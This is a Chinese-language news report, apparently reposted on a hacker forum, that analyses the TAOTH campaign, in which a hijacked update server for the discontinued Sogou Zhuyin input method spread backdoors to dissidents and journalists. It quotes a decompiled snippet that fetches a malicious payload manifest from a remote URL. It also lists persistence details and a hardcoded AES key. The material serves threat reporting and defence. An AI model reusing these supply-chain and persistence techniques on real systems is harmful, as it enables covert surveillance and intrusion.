2025 年 6 月,东亚地区收集的遥测数据中首次发现了一场此前未被记录的攻击活动 —— 该活动利用停止支持的软件发起攻击,被命名为 “TAOTH”。攻击者通过一款已停止维护的中文输入法(IME)“搜狗注音输入法(Sogou Zhuyin)”,传播多个家族的恶意软件。
初步情报显示,受害者主要为使用繁体中文的用户及异见人士,他们在下载看似合法的软件更新后,设备遭到入侵。
令人意外的是,这款已停用输入法的更新服务器竟被重新启用,这使得威胁行为者能够劫持软件分发渠道,在不引起怀疑的情况下秘密安装后门程序、间谍工具与加载器。
趋势科技(Trend Micro)的研究人员发现,自 2019 年年中起就处于休眠状态的搜狗注音输入法失效域名,早在 2024 年 11 月就开始提供恶意安装程序,此后相关恶意活动数量大幅增加。这款被篡改的更新程序 “ZhuyinUp.exe” 会连接到一个被武器化的更新配置端点,获取有效载荷清单。
受感染设备随后会下载四类不同的恶意软件家族之一 ——TOSHIS、DESFY、GTELAM 或 C6DOOR,每类恶意软件均具备特定功能,分别用于侦察、信息窃取、持久化驻留或远程访问。
数月间,数百名高价值人员遭到这类隐蔽入侵,包括中国台湾地区、中国香港地区、日本的记者、科技公司高管、活动人士,以及海外台湾同胞群体。
趋势科技分析师指出,该攻击活动的技术复杂度不仅体现在对废弃软件供应链的利用上,还在于其多阶段的感染流程。
威胁行为者将劫持的软件更新与鱼叉式钓鱼攻击相结合,既实现了广泛传播,又能精准定位目标。受害者点击恶意链接或打开诱饵文档后,其设备通常会在数小时内被入侵。
感染后的遥测数据显示,攻击者还开展了额外的侦察活动,例如目录枚举、环境指纹识别,以及通过合法云服务创建安全隧道。
在一项关键发现中,趋势科技研究人员查明了 “ZhuyinUp.exe” 获取恶意更新配置的方式,相关代码片段如下:
sub_440110(L"https://srv-pc.sogouzhuyin.com/v1/upgrade/version", config_buffer);
wcscpy_s(Destination, 100, L"SOGOU_UPDATER");
sub_419620(Destination, (int)this, flags);
这段代码展示了该更新程序如何向远程服务器查询下一个恶意有效载荷。
服务器返回的配置文件包含 URL、MD5 哈希值与文件大小,攻击者可借此验证并仅执行其特制的二进制文件。
恶意更新程序启动后,所选的有效载荷(通常是 TOSHIS)会对某个合法可执行文件的入口点进行补丁修改,以注入壳代码(shellcode)。
加载器通过 Adler-32 算法计算 API 函数哈希值,随后使用硬编码的 AES 密钥(qazxswedcvfrtgbn)下载并解密最终的后门有效载荷。
以 C6DOOR 为例,这款基于 Go 语言开发的后门程序支持 HTTP 与 WebSocket 通信,攻击者可通过它执行壳代码、截取屏幕截图,以及通过 SFTP 传输文件。
为实现持久化驻留,该恶意软件会在 “LocalSystem” 账户下注册一个名为 “SOGOU_UPDATER” 的服务 —— 这样一来,每次系统启动时,被篡改的输入法都会重新触发更新程序,确保恶意代码持续运行。
TAOTH 攻击活动通过滥用 Windows 原生更新机制,并将自身嵌入可信进程,具备极强的隐蔽性,能够规避大多数传统终端防护工具的检测。
- End-of-Support Software(停止支持的软件):指软件开发商已终止提供更新、补丁与技术支持的软件,此类软件因无法修复新发现的漏洞,易成为攻击者的目标。
- IME(Input Method Editor,输入法编辑器):用于在计算机上输入非英语字符(如中文、日文)的软件工具,搜狗注音输入法(Sogou Zhuyin)是一款曾面向中文用户的输入法产品。
- Payload Manifest(有效载荷清单):包含恶意有效载荷相关信息(如下载地址、校验值、文件大小)的配置文件,用于确保攻击者能精准分发并执行恶意代码。
- Adler-32 算法:一种快速计算哈希值的算法,常用于数据完整性校验,此处被恶意软件用于定位系统 API 函数,以规避检测。
- LocalSystem 账户:Windows 系统中的一个高权限内置账户,拥有对系统的完全控制权限,恶意软件注册为此账户下的服务可获得持久化高权限运行能力。
红客联盟·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
